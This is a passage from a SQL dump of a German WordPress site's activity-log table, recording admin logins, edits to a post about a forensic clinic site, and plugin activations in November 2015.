Draft'),(1097,221,'ClientIP','81.169.187.232'),(1098,221,'UserAgent','WordPress/4.3.1; http://www.ollital.de/wordpress'),(1099,221,'CurrentUserID','0'),(1100,222,'Username','Olli'),(1101,222,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1102,222,'ClientIP','195.128.40.90'),(1103,222,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1104,223,'PostID','371'),(1105,223,'PostType','post'),(1106,223,'PostTitle','Auto Draft'),(1107,223,'OldDate','2015-11-25 07:26:06'),(1108,223,'NewDate','2015-11-25 07:26:29'),(1109,223,'ClientIP','195.128.40.90'),(1110,223,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1111,223,'CurrentUserID','2'),(1112,223,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1113,224,'PostID','371'),(1114,224,'PostType','post'),(1115,224,'PostTitle','Standort für die Forensik bekanntgegeben'),(1116,224,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1117,224,'RevisionLink',''),(1118,224,'ClientIP','195.128.40.90'),(1119,224,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1120,224,'CurrentUserID','2'),(1121,224,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1122,225,'PostID','371'),(1123,225,'PostType','post'),(1124,225,'PostTitle','Standort für die Forensik'),(1125,225,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1126,225,'RevisionLink',''),(1127,225,'ClientIP','195.128.40.90'),(1128,225,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1129,225,'CurrentUserID','2'),(1130,225,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1131,226,'PostID','371'),(1132,226,'PostType','post'),(1133,226,'PostTitle','Standort für die Forensik'),(1134,226,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1135,226,'RevisionLink',''),(1136,226,'ClientIP','195.128.40.90'),(1137,226,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1138,226,'CurrentUserID','2'),(1139,226,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1140,227,'PostID','371'),(1141,227,'PostType','post'),(1142,227,'PostTitle','Standort für die Forensik'),(1143,227,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1144,227,'RevisionLink',''),(1145,227,'ClientIP','195.128.40.90'),(1146,227,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1147,227,'CurrentUserID','2'),(1148,227,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1149,228,'PostID','371'),(1150,228,'PostType','post'),(1151,228,'PostTitle','Standort für die Forensik'),(1152,228,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1153,228,'RevisionLink',''),(1154,228,'ClientIP','195.128.40.90'),(1155,228,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1156,228,'CurrentUserID','2'),(1157,228,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1158,229,'PostID','371'),(1159,229,'PostType','post'),(1160,229,'PostTitle','Standort für die Forensik'),(1161,229,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1162,229,'RevisionLink',''),(1163,229,'ClientIP','195.128.40.90'),(1164,229,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1165,229,'CurrentUserID','2'),(1166,229,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1167,230,'PostID','371'),(1168,230,'PostType','post'),(1169,230,'PostTitle','Standort für die Forensik'),(1170,230,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1171,230,'RevisionLink',''),(1172,230,'ClientIP','195.128.40.90'),(1173,230,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1174,230,'CurrentUserID','2'),(1175,230,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1176,231,'PostID','371'),(1177,231,'PostType','post'),(1178,231,'PostTitle','Standort für die Forensik'),(1179,231,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1180,231,'ClientIP','195.128.40.90'),(1181,231,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1182,231,'CurrentUserID','2'),(1183,231,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1184,232,'PostID','371'),(1185,232,'PostType','post'),(1186,232,'PostTitle','Standort für die Forensik'),(1187,232,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1188,232,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=372'),(1189,232,'ClientIP','195.128.40.90'),(1190,232,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1191,232,'CurrentUserID','2'),(1192,232,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1193,233,'PostID','371'),(1194,233,'PostType','post'),(1195,233,'PostTitle','Standort für die Forensik'),(1196,233,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1197,233,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=372'),(1198,233,'ClientIP','195.128.40.90'),(1199,233,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1200,233,'CurrentUserID','2'),(1201,233,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1202,234,'PostID','371'),(1203,234,'PostType','post'),(1204,234,'PostTitle','Standort für die Forensik'),(1205,234,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1206,234,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=372'),(1207,234,'ClientIP','195.128.40.90'),(1208,234,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1209,234,'CurrentUserID','2'),(1210,234,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1211,235,'Username','Olli'),(1212,235,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1213,235,'ClientIP','195.128.40.90'),(1214,235,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1215,236,'Attempts','1'),(1216,236,'Username','Olli'),(1217,236,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1218,236,'ClientIP','195.128.40.90'),(1219,236,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1220,237,'Username','Olli'),(1221,237,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1222,237,'ClientIP','195.128.40.90'),(1223,237,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1224,238,'Username','Olli'),(1225,238,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1226,238,'ClientIP','195.128.40.90'),(1227,238,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1228,239,'PostID','371'),(1229,239,'PostType','post'),(1230,239,'PostTitle','Standort für die Forensik'),(1231,239,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1232,239,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=372'),(1233,239,'ClientIP','195.128.40.90'),(1234,239,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1235,239,'CurrentUserID','2'),(1236,239,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1237,240,'PostID','371'),(1238,240,'PostType','post'),(1239,240,'PostTitle','Standort für die Forensik'),(1240,240,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1241,240,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=372'),(1242,240,'ClientIP','195.128.40.90'),(1243,240,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1244,240,'CurrentUserID','2'),(1245,240,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1246,241,'PostID','371'),(1247,241,'PostType','post'),(1248,241,'PostTitle','Standort für die Forensik'),(1249,241,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1250,241,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=372'),(1251,241,'ClientIP','195.128.40.90'),(1252,241,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1253,241,'CurrentUserID','2'),(1254,241,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1255,242,'PostID','371'),(1256,242,'PostType','post'),(1257,242,'PostTitle','Standort für die Forensik'),(1258,242,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1259,242,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=373'),(1260,242,'ClientIP','195.128.40.90'),(1261,242,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1262,242,'CurrentUserID','2'),(1263,242,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1264,243,'PostID','371'),(1265,243,'PostType','post'),(1266,243,'PostTitle','Standort für die Forensik'),(1267,243,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1268,243,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=373'),(1269,243,'ClientIP','195.128.40.90'),(1270,243,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1271,243,'CurrentUserID','2'),(1272,243,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1273,244,'PostID','371'),(1274,244,'PostType','post'),(1275,244,'PostTitle','Standort für die Forensik'),(1276,244,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1277,244,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=374'),(1278,244,'ClientIP','195.128.40.90'),(1279,244,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1280,244,'CurrentUserID','2'),(1281,244,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1282,245,'PostID','371'),(1283,245,'PostType','post'),(1284,245,'PostTitle','Standort für die Forensik'),(1285,245,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1286,245,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=374'),(1287,245,'ClientIP','195.128.40.90'),(1288,245,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1289,245,'CurrentUserID','2'),(1290,245,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1291,246,'PostID','371'),(1292,246,'PostType','post'),(1293,246,'PostTitle','Standort für die Forensik'),(1294,246,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1295,246,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=374'),(1296,246,'ClientIP','195.128.40.90'),(1297,246,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1298,246,'CurrentUserID','2'),(1299,246,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1300,247,'PostID','371'),(1301,247,'PostType','post'),(1302,247,'PostTitle','Standort für die Forensik'),(1303,247,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1304,247,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=374'),(1305,247,'ClientIP','195.128.40.90'),(1306,247,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1307,247,'CurrentUserID','2'),(1308,247,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1309,248,'PostID','371'),(1310,248,'PostType','post'),(1311,248,'PostTitle','Standort für die Forensik'),(1312,248,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1313,248,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=374'),(1314,248,'ClientIP','195.128.40.90'),(1315,248,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1316,248,'CurrentUserID','2'),(1317,248,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1318,249,'PostID','371'),(1319,249,'PostType','post'),(1320,249,'PostTitle','Standort für die Forensik'),(1321,249,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1322,249,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=375'),(1323,249,'ClientIP','195.128.40.90'),(1324,249,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1325,249,'CurrentUserID','2'),(1326,249,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1327,250,'Username','Olli'),(1328,250,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1329,250,'ClientIP','195.128.40.90'),(1330,250,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1331,251,'PostID','371'),(1332,251,'PostType','post'),(1333,251,'PostTitle','Standort für die Forensik'),(1334,251,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1335,251,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=375'),(1336,251,'ClientIP','195.128.40.90'),(1337,251,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1338,251,'CurrentUserID','2'),(1339,251,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1340,252,'PostID','371'),(1341,252,'PostType','post'),(1342,252,'PostTitle','Standort für die Forensik'),(1343,252,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1344,252,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=376'),(1345,252,'ClientIP','195.128.40.90'),(1346,252,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1347,252,'CurrentUserID','2'),(1348,252,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1349,253,'Username','Olli'),(1350,253,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1351,253,'ClientIP','195.128.40.90'),(1352,253,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1353,254,'PostID','371'),(1354,254,'PostType','post'),(1355,254,'PostTitle','Standort für die Forensik'),(1356,254,'PostUrl','http://www.ollital.de/wordpress/?p=371'),(1357,254,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=376'),(1358,254,'ClientIP','195.128.40.90'),(1359,254,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1360,254,'CurrentUserID','2'),(1361,254,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1362,255,'PostID','371'),(1363,255,'PostType','post'),(1364,255,'PostTitle','Standort für die Forensik'),(1365,255,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/standort-fur-die-forensik/'),(1366,255,'ClientIP','195.128.40.90'),(1367,255,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1368,255,'CurrentUserID','2'),(1369,255,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1370,256,'PostID','371'),(1371,256,'PostType','post'),(1372,256,'PostTitle','Standort für die Forensik'),(1373,256,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/standort-fur-die-forensik/'),(1374,256,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=376'),(1375,256,'ClientIP','195.128.40.90'),(1376,256,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1377,256,'CurrentUserID','2'),(1378,256,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1379,257,'Username','Olli'),(1380,257,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1381,257,'ClientIP','195.128.40.90'),(1382,257,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1383,258,'Username','Olli'),(1384,258,'CurrentUserRoles','a:3:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";i:2;s:10:\"superadmin\";}'),(1385,258,'ClientIP','195.128.40.90'),(1386,258,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1387,259,'Username','Olli'),(1388,259,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1389,259,'ClientIP','195.128.40.90'),(1390,259,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1391,260,'Username','Olli'),(1392,260,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1393,260,'ClientIP','195.128.40.90'),(1394,260,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1395,261,'PostID','371'),(1396,261,'PostType','post'),(1397,261,'PostTitle','Standort für die Forensik'),(1398,261,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/standort-fur-die-forensik/'),(1399,261,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=377'),(1400,261,'ClientIP','195.128.40.90'),(1401,261,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1402,261,'CurrentUserID','2'),(1403,261,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1404,262,'PostID','371'),(1405,262,'PostType','post'),(1406,262,'PostTitle','Standort für die Forensik'),(1407,262,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/standort-fur-die-forensik/'),(1408,262,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=378'),(1409,262,'ClientIP','195.128.40.90'),(1410,262,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1411,262,'CurrentUserID','2'),(1412,262,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1413,263,'PluginFile','/var/www/wordpress/wp-content/plugins/smooth-slider/smooth-slider.php'),(1414,263,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:13:\"Smooth Slider\";s:9:\"PluginURI\";s:37:\"http://slidervilla.com/smooth-slider/\";s:7:\"Version\";s:5:\"2.8.2\";s:6:\"Author\";s:11:\"SliderVilla\";s:7:\"Network\";s:5:\"False\";}'),(1415,263,'ClientIP','195.128.40.90'),(1416,263,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1417,263,'CurrentUserID','2'),(1418,263,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1419,264,'Username','Olli'),(1420,264,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1421,264,'ClientIP','5.147.41.205'),(1422,264,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1423,265,'PluginFile','/var/www/wordpress/wp-content/plugins/hello.php'),(1424,265,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:11:\"Hello Dolly\";s:9:\"PluginURI\";s:41:\"http://wordpress.org/plugins/hello-dolly/\";s:7:\"Version\";s:3:\"1.6\";s:6:\"Author\";s:14:\"Matt Mullenweg\";s:7:\"Network\";s:5:\"False\";}'),(1425,265,'ClientIP','195.128.40.90'),(1426,265,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1427,265,'CurrentUserID','2'),(1428,265,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1429,266,'Plugin','O:8:\"stdClass\":6:{s:4:\"Name\";s:15:\"Cookie Law Info\";s:9:\"PluginURI\";s:64:\"http://wordpress.org/extend/plugins/cookie-law-info/description/\";s:7:\"Version\";s:5:\"1.5.3\";s:6:\"Author\";s:13:\"Richard Ashby\";s:7:\"Network\";s:5:\"False\";s:15:\"plugin_dir_path\";s:38:\"/var/www/wordpress/wp-content/plugins/\";}'),(1430,266,'ClientIP','195.128.40.90'),(1431,266,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1432,266,'CurrentUserID','2'),(1433,266,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1434,267,'PluginFile','/var/www/wordpress/wp-content/plugins/cookie-law-info/cookie-law-info.php'),(1435,267,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:15:\"Cookie Law Info\";s:9:\"PluginURI\";s:64:\"http://wordpress.org/extend/plugins/cookie-law-info/description/\";s:7:\"Version\";s:5:\"1.5.3\";s:6:\"Author\";s:13:\"Richard Ashby\";s:7:\"Network\";s:5:\"False\";}'),(1436,267,'ClientIP','195.128.40.90'),(1437,267,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1438,267,'CurrentUserID','2'),(1439,267,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1440,268,'Username','Olli'),(1441,268,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1442,268,'ClientIP','195.128.40.90'),(1443,268,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1444,269,'Username','Olli'),(1445,269,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1446,269,'ClientIP','195.128.40.90'),(1447,269,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1448,270,'PostID','379'),(1449,270,'PostType','page'),(1450,270,'PostTitle','Auto Draft'),(1451,270,'OldDate','2015-11-26 14:03:13'),(1452,270,'NewDate','2015-11-26 14:03:24'),(1453,270,'ClientIP','195.128.40.90'),(1454,270,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1455,270,'CurrentUserID','2'),(1456,270,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1457,271,'PostID','379'),(1458,271,'PostType','page'),(1459,271,'PostTitle','Abkürzungen'),(1460,271,'PostUrl','http://www.ollital.de/wordpress/?page_id=379'),(1461,271,'RevisionLink',''),(1462,271,'ClientIP','195.128.40.90'),(1463,271,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1464,271,'CurrentUserID','2'),(1465,271,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1466,272,'PostID','380'),(1467,272,'PostType','tablepress_table'),(1468,272,'PostTitle','Abkürzungen'),(1469,272,'PostUrl','http://www.ollital.de/wordpress/?post_type=tablepress_table&p=380'),(1470,272,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=381'),(1471,272,'ClientIP','195.128.40.90'),(1472,272,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1473,272,'CurrentUserID','2'),(1474,272,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1475,273,'PostID','382'),(1476,273,'PostType','page'),(1477,273,'PostTitle','Auto Draft'),(1478,273,'OldDate','2015-11-26 14:08:32'),(1479,273,'NewDate','2015-11-26 14:08:42'),(1480,273,'ClientIP','195.128.40.90'),(1481,273,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1482,273,'CurrentUserID','2'),(1483,273,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1484,274,'PostID','382'),(1485,274,'PostType','page'),(1486,274,'PostTitle','Abkürzungen'),(1487,274,'PostUrl','http://www.ollital.de/wordpress/?page_id=382'),(1488,274,'RevisionLink',''),(1489,274,'ClientIP','195.128.40.90'),(1490,274,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 